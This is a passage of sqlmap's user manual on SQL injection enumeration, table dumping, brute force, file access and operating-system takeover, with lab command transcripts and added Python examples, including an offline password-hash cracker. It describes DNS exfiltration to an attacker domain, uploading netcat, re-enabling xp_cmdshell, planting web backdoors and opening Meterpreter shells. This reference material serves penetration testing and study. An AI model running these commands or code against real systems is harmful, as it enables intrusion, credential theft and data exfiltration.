Option: --dns-domain

The DNS exfiltration SQL injection attack is described in the paper Data Retrieval over DNS in SQL Injection Attacks, while a presentation of its implementation inside sqlmap can be found in the slides DNS exfiltration using sqlmap.

If the user controls a machine registered as the DNS server for a domain (e.g. attacker.com), this attack can be turned on with this option (e.g. --dns-domain attacker.com). Prerequisites are running sqlmap with Administrator privileges (it binds the privileged port 53) and that at least one normal (blind) technique is available for exploitation. The sole purpose of this attack is to speed up data retrieval when only a blind technique has been identified (time-based blind being the case where it helps most). If error-based or UNION query techniques are available it is skipped, as those are preferred by default.

Second-order attack

Option: --second-order

Second-order SQL injection is an attack where the result(s) of a payload injected in one vulnerable page are shown (reflected) on another (e.g. a frame). Usually that happens because the user-provided input is stored in the database by the original vulnerable page.

You can manually tell sqlmap to test for this type of SQL injection by using option --second-order with the URL address of the web page where the results are shown.

Fingerprint

Extensive database management system fingerprint

Switches: -f or --fingerprint

By default the web application’s back-end database management system fingerprint is handled automatically by sqlmap. Just after the detection phase finishes and the user is eventually prompted with a choice of which vulnerable parameter to use further on, sqlmap fingerprints the back-end database management system and continues on with the injection by knowing which SQL syntax, dialect and queries to use to proceed with the attack within the limits of the database architecture.

If for any instance you want to perform an extensive database management system fingerprint based on various techniques like specific SQL dialects and inband error messages, you can provide the switch --fingerprint. sqlmap will perform a lot more requests and fingerprint the exact DBMS version and, where possible, operating system, architecture and patch level.

If you want an even more accurate fingerprint, you can also provide the switch -b or --banner.

Enumeration

These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements.

Retrieve all

Switch: --all

This switch can be used when the user wants to retrieve everything remotely accessible with a single switch. This is not recommended, as it generates a large number of requests retrieving both useful and useless data.

Banner

Switch: -b or --banner

Most modern database management systems have a function and/or an environment variable which returns the database management system version and possibly details on its patch level and the underlying system. Usually the function is version() and the environment variable is @@version, but this varies depending on the target DBMS.

Example against an Oracle target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" -\
-banner

[...]
[xx:xx:11] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner:    'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'

Session user

Switch: --current-user

With this switch it is possible to retrieve the database management system’s user which is effectively performing the query against the back-end DBMS from the web application.

Current database

Switch: --current-db

With this switch it is possible to retrieve the database management system’s database name that the web application is connected to.

Server hostname

Switch: --hostname

With this switch it is possible to retrieve the database management system’s hostname.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --\
hostname

[...]
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname:    'debian-5.0-i386'

Detect whether or not the session user is a database administrator

Switch: --is-dba

It is possible to detect if the current database management system session user is a database administrator, also known as DBA. sqlmap will return True if it is, False otherwise.

List database management system users

Switch: --users

When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the list of users.

List and crack database management system users password hashes

Switch: --passwords

When the session user has read access to the system table containing information about the DBMS users’ passwords, it is possible to enumerate the password hashes for each database management system user. sqlmap will first enumerate the users, then the different password hashes for each of them.

Example against a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
passwords -v 1

[...]
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt] 
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass

Not only did sqlmap enumerate the DBMS users and their password hashes, it also recognized the hash format to be PostgreSQL's, asked the user whether or not to test the hashes against a dictionary file, and identified the clear-text password for the postgres user (which is usually a DBA) as well as for the other user, testuser.

This feature has been implemented for all DBMS where it is possible to enumerate users’ password hashes, including Oracle and Microsoft SQL Server pre and post 2005.

You can also provide the option -U to specify the specific user who you want to enumerate and eventually crack the password hash(es). If you provide CU as username it will consider it as an alias for current user and will retrieve the password hash(es) for this user.
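
The following Python is an added example, not sqlmap's own code, of what the dictionary attack shown above does for the postgres_passwd hash method. PostgreSQL stores 'md5' followed by md5(password || username), so the username acts as a salt and the same password yields a different hash per user, as the listing above shows for testpass. The wordlist is constructed; the two hashes are copied from the transcript above, and running the script should recover testpass for both users. The suffixes tuple models the "common password suffixes" prompt.

```python
# Added example: offline dictionary attack on PostgreSQL md5 password hashes
import hashlib


def postgres_md5(password, username):
    """Build a PostgreSQL md5-style password hash: 'md5' + md5(password || username)."""
    return "md5" + hashlib.md5((password + username).encode()).hexdigest()


def crack(hashes, wordlist, suffixes=("",)):
    """Try every word (with each suffix appended in turn) against each
    (username, hash) pair. Returns {username: clear-text password or None}."""
    found = {}
    for user, h in hashes.items():
        found[user] = None
        for word in wordlist:
            for suf in suffixes:
                candidate = word + suf
                # The username is part of the hashed input, so the same
                # candidate has to be re-hashed for every user
                if postgres_md5(candidate, user) == h:
                    found[user] = candidate
                    break
            if found[user] is not None:
                break
    return found


# Constructed wordlist standing in for txt/wordlist.txt
WORDLIST = ["password", "admin", "postgres", "testpass"]

# Hashes exactly as printed in the sqlmap output above
HASHES = {
    "postgres": "md5d7d880f96044b72d0bba108ace96d1e4",
    "testuser": "md599e5ea7a6f7c3269995cba3927fd0093",
}

if __name__ == "__main__":
    for user, clear in crack(HASHES, WORDLIST, suffixes=("", "1", "123", "!")).items():
        print("%s: %s" % (user, clear if clear else "not found"))
```

Because of the username salt, a precomputed table for one user is worthless for another, which is also why the suffix variants multiply the cost per user rather than per wordlist.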

List database management system users privileges

Switch: --privileges

When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the privileges for each database management system user. By the privileges, sqlmap will also show you which are database administrators.

You can also provide the option -U to specify the user who you want to enumerate the privileges.

If you provide CU as username it will consider it as an alias for current user and will enumerate the privileges for this user.

On Microsoft SQL Server, this feature will display you whether or not each user is a database administrator rather than the list of privileges for all users.

List database management system users roles

Switch: --roles

When the session user has read access to the system table containing information about the DBMS users, it is possible to enumerate the roles for each database management system user.

You can also provide the option -U to specify the user whose roles you want to enumerate.

If you provide CU as username it will consider it as an alias for current user and will enumerate the roles for this user.

This feature is only available when the DBMS is Oracle.

List database management system’s databases

Switch: --dbs

When the session user has read access to the system table containing information about available databases, it is possible to enumerate the list of databases.

Enumerate database’s tables

Switches and option: --tables, --exclude-sysdbs and -D

When the session user has read access to the system table containing information about databases’ tables, it is possible to enumerate the list of tables for a specific database management system’s databases.

If you do not provide a specific database with option -D, sqlmap will enumerate the tables for all DBMS databases.

You can also provide the switch --exclude-sysdbs to exclude all system databases.

Note that on Oracle you have to provide the TABLESPACE_NAME instead of the database name.

Enumerate database table columns

Switch and options: --columns, -C, -T and -D

When the session user has read access to the system table containing information about database’s tables, it is possible to enumerate the list of columns for a specific database table. sqlmap also enumerates the data-type for each column.

This feature depends on option -T to specify the table name and optionally on -D to specify the database name. When the database name is not specified, the current database name is used. You can also provide the -C option to restrict the enumeration to column names matching the ones you provide.

Example against a SQLite target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -\
-columns -D testdb -T users -C name
[...]
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+

Note that on PostgreSQL you have to provide public or the name of a system database. That’s because it is not possible to enumerate other databases tables, only the tables under the schema that the web application’s user is connected to, which is always aliased by public.

Enumerate database management system schema

Switches: --schema and --exclude-sysdbs

User can retrieve a DBMS schema by using this switch. Schema listing will contain all databases, tables and columns, together with their respective types. In combination with --exclude-sysdbs only part of the schema containing non-system databases will be retrieved and shown.

Example against a MySQL target:

$ python sqlmap.py -u "http://192.168.48.130/sqlmap/mysql/get_int.php?id=1" --s\
chema --batch --exclude-sysdbs

[...]
Database: owasp10
Table: accounts
[4 columns]
+-------------+---------+
| Column      | Type    |
+-------------+---------+
| cid         | int(11) |
| mysignature | text    |
| password    | text    |
| username    | text    |
+-------------+---------+

Database: owasp10
Table: blogs_table
[4 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| date         | datetime |
| blogger_name | text     |
| cid          | int(11)  |
| comment      | text     |
+--------------+----------+

Database: owasp10
Table: hitlog
[6 columns]
+----------+----------+
| Column   | Type     |
+----------+----------+
| date     | datetime |
| browser  | text     |
| cid      | int(11)  |
| hostname | text     |
| ip       | text     |
| referer  | text     |
+----------+----------+

Database: testdb
Table: users
[3 columns]
+---------+---------------+
| Column  | Type          |
+---------+---------------+
| id      | int(11)       |
| name    | varchar(500)  |
| surname | varchar(1000) |
+---------+---------------+
[...]

Retrieve number of entries for table(s)

Switch: --count

If the user just wants to know the number of entries in table(s) before dumping the desired one, this switch can be used.

Example against a Microsoft SQL Server target:

$ python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1"\
 --count -D testdb
[...]
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+

Dump database table entries

Switch and options: --dump, -C, -T, -D, --start, --stop, --first, --last, --pivot-column and --where

When the session user has read access to a specific database’s table it is possible to dump the table entries.

This functionality depends on option -T to specify the table name and optionally on option -D to specify the database name. If the table name is provided, but the database name is not, the current database name is used.

Example against a Firebird target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1"\
 --dump -T users
[...]
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+

This switch can also be used to dump all tables’ entries of a provided database. You simply have to provide sqlmap with the switch --dump along with only the option -D (no -T and no -C).

You can also provide a comma-separated list of the specific columns to dump with the option -C.

sqlmap also generates for each table dumped the entries in a CSV format textual file. You can see the absolute path where sqlmap creates the file by providing a verbosity level greater than or equal to 1.

If you want to dump only a range of entries, then you can provide options --start and/or --stop to respectively start the dump from a certain entry and stop it at a certain entry. For instance, if you want to dump only the first entry, provide --stop 1 on your command line. Conversely, if you want to dump only the second and third entry, provide --start 1 --stop 3.

It is also possible to specify which single character or range of characters to dump with options --first and --last. For instance, if you want to dump columns’ entries from the third to the fifth character, provide --first 3 --last 5. This feature only applies to the blind SQL injection techniques because for error-based and UNION query SQL injection techniques the number of requests is exactly the same, regardless of the length of the column’s entry output to dump.

Sometimes (e.g. for Microsoft SQL Server, Sybase and SAP MaxDB) it is not possible to dump the table rows straightforwardly using an OFFSET m, n mechanism because the DBMS lacks one. In such cases sqlmap dumps the content by determining the most suitable pivot column (the one with the most unique values), whose values are then used to retrieve the other columns' values. If it is necessary to enforce a particular pivot column because the automatically chosen one is not suitable (e.g. the table dump comes back empty or incomplete), use option --pivot-column (e.g. --pivot-column=id).

If you want to constrain the dump to specific column values (or ranges) you can use option --where. The provided logical condition will be used inside the WHERE clause. For example, with --where="id>3" only table rows whose column id has a value greater than 3 will be retrieved (by appending WHERE id>3 to the dumping queries).

As you may have noticed by now, sqlmap is flexible: you can leave it to automatically dump the whole database table or you can be very precise in which characters to dump, from which columns and which range of entries.
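
The following Python is an added example, not sqlmap's own code. It reproduces the pivot-column walk described above on an in-memory SQLite table (SQLite stands in for a DBMS without OFFSET; the queries simply never use it) and shows why the pivot must be unique and non-NULL: pivoting on name loses the NULL row and one of the two wu rows, which is the "empty or incomplete dump" symptom that --pivot-column=id fixes. It also shows how the --where condition is appended verbatim to the dumping query. The sample rows are constructed, modelled on the users table dumped above, with one extra duplicate row added on purpose.

```python
# Added example: dumping rows through a pivot column, and the --where clause
import sqlite3

ROWS = [  # constructed sample data modelled on the users table above
    (1, "luther", "blisset"),
    (2, "fluffy", "bunny"),
    (3, "wu", "ming"),
    (4, None, "nameisnull"),
    (5, "wu", "ming"),  # duplicate name/surname: only id is unique here
]

COLUMNS = ["id", "name", "surname"]


def make_db():
    """Build the in-memory stand-in for the target table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, surname TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return conn


def count_distinct(conn, column):
    # COUNT(DISTINCT ...) ignores NULL, so a column with NULLs scores lower
    return conn.execute("SELECT COUNT(DISTINCT %s) FROM users" % column).fetchone()[0]


def choose_pivot(conn, columns):
    """The automatic choice: the column with the most distinct values."""
    return max(columns, key=lambda c: count_distinct(conn, c))


def dump_with_pivot(conn, pivot, columns):
    """Walk the table one row at a time without OFFSET: take the smallest
    pivot value greater than the last one seen, then fetch the row for it.
    Rows whose pivot value is NULL or duplicated are silently lost."""
    rows = []
    last = None
    while True:
        if last is None:
            nxt = conn.execute("SELECT MIN(%s) FROM users" % pivot).fetchone()[0]
        else:
            nxt = conn.execute(
                "SELECT MIN(%s) FROM users WHERE %s > ?" % (pivot, pivot), (last,)
            ).fetchone()[0]
        if nxt is None:
            break
        # In a blind scenario this is one request per column per row
        row = conn.execute(
            "SELECT %s FROM users WHERE %s = ?" % (", ".join(columns), pivot), (nxt,)
        ).fetchone()
        rows.append(row)
        last = nxt
    return rows


def dump_where(conn, columns, where):
    """The --where option: the user's condition is appended verbatim to the
    dumping query (in sqlmap's context it is the operator's own input)."""
    return conn.execute(
        "SELECT %s FROM users WHERE %s" % (", ".join(columns), where)
    ).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print("auto pivot:", choose_pivot(conn, COLUMNS))
    print("pivot=id  :", dump_with_pivot(conn, "id", COLUMNS))
    print("pivot=name:", dump_with_pivot(conn, "name", COLUMNS))
    print("--where   :", dump_where(conn, COLUMNS, "id>3"))
```

The walk costs one MIN() lookup per row on top of the per-column retrieval, which is why sqlmap only falls back to it on DBMSs without an OFFSET equivalent.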

Dump all databases tables entries

Switches: --dump-all and --exclude-sysdbs

It is possible to dump all databases tables entries at once that the session user has read access on.

You can also provide the switch --exclude-sysdbs to exclude all system databases. In that case sqlmap will only dump entries of users’ databases tables.

Note that on Microsoft SQL Server the master database is not considered a system database because some database administrators use it as a users’ database.

Search for columns, tables or databases

Switch and options: --search, -C, -T, -D

This switch allows you to search for specific database names, specific tables across all databases or specific columns across all databases’ tables.

This is useful, for instance, to identify tables containing custom application credentials, where the relevant columns' names contain strings like name and pass.

Switch --search needs to be used in conjunction with one of the following support options:

  • -C following a list of comma-separated column names to look for across the whole database management system.
  • -T following a list of comma-separated table names to look for across the whole database management system.
  • -D following a list of comma-separated database names to look for across the database management system.

Run custom SQL statement

Option and switch: --sql-query and --sql-shell

The SQL query and the SQL shell features allow to run arbitrary SQL statements on the database management system. sqlmap automatically dissects the provided statement, determines which technique is appropriate to use to inject it and how to pack the SQL payload accordingly.

If the query is a SELECT statement, sqlmap will retrieve its output. Otherwise it will execute the query through the stacked query SQL injection technique, if the web application supports multiple statements on the back-end database management system. Beware that some web application technologies do not support stacked queries on specific database management systems. For instance, PHP's classic mysql_query() and mysqli_query() calls do not support stacked queries when the back-end DBMS is MySQL (mysqli_multi_query() and PDO with emulated prepared statements are the exceptions), but pg_query() does support them when the back-end DBMS is PostgreSQL.

Examples against a Microsoft SQL Server 2000 target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo'" -v 1

[...]
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --\
sql-query "SELECT 'foo', 'bar'" -v 2

[...]
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now 
unpack it into distinct queries to be able to retrieve the output even if we are
 going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS 
VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VA
RCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
SELECT 'foo', 'bar':    'foo, bar'

As you can see, sqlmap splits the provided query into two different SELECT statements then retrieves the output for each separate query.

If the provided query is a SELECT statement and contains a FROM clause, sqlmap will ask you if such statement can return multiple entries. In that case the tool knows how to unpack the query correctly to count the number of possible entries and retrieve its output, entry per entry.
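
The statement dissection described above, as an added Python example that is not sqlmap's own code: it splits the SELECT list on top-level commas only (commas inside quotes and parentheses are left alone) and wraps each field the way the verbose output above shows for Microsoft SQL Server, with ISNULL/CAST so that a NULL result is not mistaken for a failed retrieval. The regex-based FROM detection is a simplification: a FROM keyword inside a string literal would confuse it.

```python
import re

# SELECT <fields> [FROM ...]; the optional tail is carried over unchanged.
SELECT_RE = re.compile(
    r"^\s*SELECT\s+(?P<fields>.*?)(?P<rest>\s+FROM\b.*)?\s*$",
    re.IGNORECASE | re.DOTALL,
)


def split_select_fields(select_list):
    """Split a SELECT list on top-level commas, leaving commas inside quotes
    and parentheses (e.g. CONCAT(a, ',', b)) untouched."""
    fields, cur, depth, quote = [], [], 0, None
    for ch in select_list:
        if quote:
            cur.append(ch)
            if ch == quote:
                quote = None
        elif ch in ("'", '"'):
            quote = ch
            cur.append(ch)
        elif ch == "(":
            depth += 1
            cur.append(ch)
        elif ch == ")":
            depth -= 1
            cur.append(ch)
        elif ch == "," and depth == 0:
            fields.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    if "".join(cur).strip():
        fields.append("".join(cur).strip())
    return fields


def unpack_query(query):
    """Turn a multi-field SELECT into one single-field SELECT per field, each
    cast to VARCHAR(8000) with NULL replaced by a space (Microsoft SQL Server
    flavour), so every field can be retrieved even through blind injection."""
    m = SELECT_RE.match(query)
    if not m:
        raise ValueError("only SELECT statements can be unpacked")
    rest = m.group("rest") or ""
    return [
        f"SELECT ISNULL(CAST(({f}) AS VARCHAR(8000)), ' '){rest}"
        for f in split_select_fields(m.group("fields"))
    ]


if __name__ == "__main__":
    for q in unpack_query("SELECT name, CONCAT(a, ',', b) FROM users WHERE id=1"):
        print(q)
```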

The SQL shell option allows you to run your own SQL statement interactively, like a SQL console connected to the database management system. This feature provides TAB completion and history support too.

Brute force

These switches can be used to run brute force checks.

Brute force tables names

Switch: --common-tables

There are cases where switch --tables can not be used to retrieve the databases' table names. These cases usually fit into one of the following categories:

  • The database management system is MySQL < 5.0 where information_schema is not available.
  • The database management system is Microsoft Access and system table MSysObjects is not readable – default setting.
  • The session user does not have read privileges against the system table storing the schema of the databases.

If either of the first two cases applies and you provided the switch --tables, sqlmap will prompt you to fall back to this technique. Whichever of these cases applies to your situation, sqlmap can possibly still identify some existing tables if you provide it with the switch --common-tables: it then brute-forces the existence of common table names across the DBMS.

The list of common table names is txt/common-tables.txt and you can edit it as you wish.

Example against a MySQL 4.1 target:

$ python sqlmap.py -u "http://192.168.136.129/mysql/get_int_4.php?id=1" --commo\
n-tables -D testdb --banner

[...]
[hh:mm:39] [INFO] testing MySQL
[hh:mm:39] [INFO] confirming MySQL
[hh:mm:40] [INFO] the back-end DBMS is MySQL
[hh:mm:40] [INFO] fetching banner
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS operating system: Windows
back-end DBMS: MySQL < 5.0.0
banner:    '4.1.21-community-nt'

[hh:mm:40] [INFO] checking table existence using items from '/software/sqlmap/tx
t/common-tables.txt'
[hh:mm:40] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)] 8
[hh:mm:43] [INFO] retrieved: users

Database: testdb
[1 table]
+-------+
| users |
+-------+

Brute force columns names

Switch: --common-columns

As per tables, there are cases where switch --columns can not be used to retrieve the databases' tables' column names. These cases usually fit into one of the following categories:

  • The database management system is MySQL < 5.0 where information_schema is not available.
  • The database management system is Microsoft Access where this kind of information is not available inside system tables.
  • The session user does not have read privileges against the system table storing the schema of the databases.

If either of the first two cases applies and you provided the switch --columns, sqlmap will prompt you to fall back to this technique. Whichever of these cases applies to your situation, sqlmap can possibly still identify some existing columns if you provide it with the switch --common-columns: it then brute-forces the existence of common column names in the given table(s).

The list of common column names is txt/common-columns.txt and you can edit it as you wish.
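
The brute-force fallback used by both --common-tables and --common-columns, as an added Python example that is not sqlmap's code: an in-memory SQLite database with constructed table names stands in for a MySQL < 5.0 target, words scraped from a constructed page body are added to the wordlist (as the log line adding words used on web page to the check list above indicates), and the boolean oracle is SQLite raising an error, in place of the page-content difference a boolean-based blind payload would produce on a real target.

```python
import re
import sqlite3

# Constructed target: stands in for a MySQL < 5.0 back end whose schema
# cannot be read from information_schema. Table and column names are made up.
def make_target():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.execute("CREATE TABLE sungkaipromo (id INTEGER, title TEXT)")
    return conn

# Small stand-ins for txt/common-tables.txt and txt/common-columns.txt.
COMMON_TABLES = ["admin", "members", "orders", "products", "users"]
COMMON_COLUMNS = ["id", "user", "username", "pass", "password", "email"]

# Constructed page body: words seen on the page are added to the candidates.
PAGE = "<html><body><h1>Sungkaipromo</h1> specials for members this week</body></html>"

# never interpolate a candidate that is not a plain identifier
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*$")


def words_from_page(html):
    text = re.sub(r"<[^>]+>", " ", html)
    return {w.lower() for w in re.findall(r"[A-Za-z_]{3,}", text)}


def oracle(conn, sql):
    """Boolean oracle: True when the probed statement runs without error.
    On a real target this is the true/false page difference produced by a
    payload such as ... AND (SELECT COUNT(*) FROM <name>)>=0."""
    try:
        conn.execute(sql).fetchall()
        return True
    except sqlite3.Error:
        return False


def brute_tables(conn, candidates):
    found = []
    for t in sorted(set(candidates)):
        if IDENT.match(t) and oracle(conn, f"SELECT COUNT(*) FROM {t}"):
            found.append(t)
    return found


def brute_columns(conn, table, candidates):
    found = []
    for c in candidates:
        if IDENT.match(c) and oracle(conn, f"SELECT COUNT({c}) FROM {table}"):
            found.append(c)
    return found


if __name__ == "__main__":
    db = make_target()
    for t in brute_tables(db, COMMON_TABLES + sorted(words_from_page(PAGE))):
        print(t, brute_columns(db, t, COMMON_COLUMNS))
```

Each candidate costs at least one request (more for time-based blind), so the wordlist size, not the DBMS, bounds how long this takes; that is why sqlmap asks for a thread count before starting.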

User-defined function injection

These options can be used to create custom user-defined functions.

Inject custom user-defined functions (UDF)

Switch and option: --udf-inject and --shared-lib

You can inject your own user-defined functions (UDFs) by compiling a MySQL or PostgreSQL shared library, DLL for Windows and shared object for Linux/Unix, then provide sqlmap with the path where the shared library is stored locally on your machine. sqlmap will then ask you some questions, upload the shared library on the database server file system, create the user-defined function(s) from it and, depending on your options, execute them. When you are finished using the injected UDFs, sqlmap can also remove them from the database for you.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Use option --udf-inject and follow the instructions.

If you want, you can specify the shared library's local file system path via the command line too by using the --shared-lib option. Otherwise sqlmap will ask you for the path at runtime.

This feature is available only when the database management system is MySQL or PostgreSQL.

File system access

Read a file from the database server’s file system

Option: --file-read

It is possible to retrieve the content of files from the underlying file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a textual or a binary file. sqlmap will handle it properly.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a Microsoft SQL Server 2005 target to retrieve a binary file:

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?nam\
e=luther" --file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/
C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe 
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C_
_example.exe

$ file output/192.168.136.129/files/C__example.exe 
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI
) Intel 80386 32-bit

Upload a file to the database server’s file system

Options: --file-write and --file-dest

It is possible to upload a local file to the database server’s file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. The file specified can be either a textual or a binary file. sqlmap will handle it properly.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a MySQL target to upload a binary UPX-compressed file:

$ file /software/nc.exe.packed 
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32
-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -\
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'

Operating system takeover

Run arbitrary operating system command

Option and switch: --os-cmd and --os-shell

It is possible to run arbitrary commands on the database server’s underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses.

On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then it creates these two functions on the database and calls one of them to execute the specified command, depending on user’s choice to display the standard output or not. On Microsoft SQL Server, sqlmap abuses the xp_cmdshell stored procedure: if it is disabled (by default on Microsoft SQL Server >= 2005), sqlmap re-enables it; if it does not exist, sqlmap creates it from scratch.

When the user requests the standard output, sqlmap uses one of the enumeration SQL injection techniques (blind, inband or error-based) to retrieve it. Otherwise, if the standard output is not required, the stacked query SQL injection technique is used to execute the command.

These techniques are detailed in the white paper Advanced SQL injection to operating system full control.

Example against a PostgreSQL target:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --\
os-cmd id -v 1

[...]
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: PostgreSQL
[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:12] [INFO] the back-end DBMS operating system is Linux
[hh:mm:12] [INFO] testing if current user is DBA
[hh:mm:12] [INFO] detecting back-end DBMS version from its banner
[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:    'uid=104(postgres) gid=106(postgres) groups=106(post
gres)'

[hh:mm:19] [INFO] cleaning up the database management system
do you want to remove UDF 'sys_eval'? [Y/n] y
do you want to remove UDF 'sys_exec'? [Y/n] y
[hh:mm:23] [INFO] database management system cleanup finished
[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file sys
tem can only be deleted manually

It is also possible to simulate a real shell where you can type as many arbitrary commands as you wish. The option is --os-shell and has the same TAB completion and history functionalities that --sql-shell has.

Where stacked queries have not been identified on the web application (e.g. PHP or ASP with MySQL as the back-end database management system) and the DBMS is MySQL, it is still possible to abuse the SELECT clause's INTO OUTFILE to create a web backdoor in a writable folder within the web server document root, and so still get command execution, assuming the back-end DBMS and the web server are hosted on the same machine. sqlmap supports this technique and lets the user provide a comma-separated list of possible document root sub-folders where it tries to upload the web file stager and the subsequent web backdoor. sqlmap also ships its own tested web file stagers and backdoors for the following languages:

  • ASP
  • ASP.NET
  • JSP
  • PHP

Out-of-band stateful connection: Meterpreter & friends

Switches and options: --os-pwn, --os-smbrelay, --os-bof, --priv-esc, --msf-path and --tmp-path

It is possible to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.

